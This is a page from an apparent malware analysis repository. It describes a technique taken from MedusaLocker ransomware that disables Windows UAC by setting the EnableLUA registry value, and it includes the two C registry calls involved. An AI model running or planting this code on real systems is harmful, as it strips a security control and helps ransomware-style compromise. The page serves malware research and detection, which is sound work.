MalwareAnalysisSeries

This repository contains the analysis reports, technical details or any tools created for helping in malware analysis. Additionally, the repo contains extracted TTPs with code along with the detection rules

Project maintained by shaddy43 Hosted on GitHub Pages — Theme by mattgraham

MedusaLocker: Disable UAC

MedusaLocker Image

This TTP is used to disable UAC in the victim system and has been extracted from MedusaLocker Ransomware. It modifies registry keys to disable UAC. It requires Admin privileges and Restart to completely disable the UAC on the system. Once the testcase has successfully been executed, every process will open as admin by default.

Open the registry key

RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_ALL_ACCESS, &hKey);

Change the value

RegSetValueEx(hKey, L"EnableLUA", 0, REG_DWORD, (LPBYTE)&value, sizeof(DWORD));

Find Complete Code Click Here: Shaddy43/MalwareAnalaysisSeries

Disclaimer

For educational purposes only!!!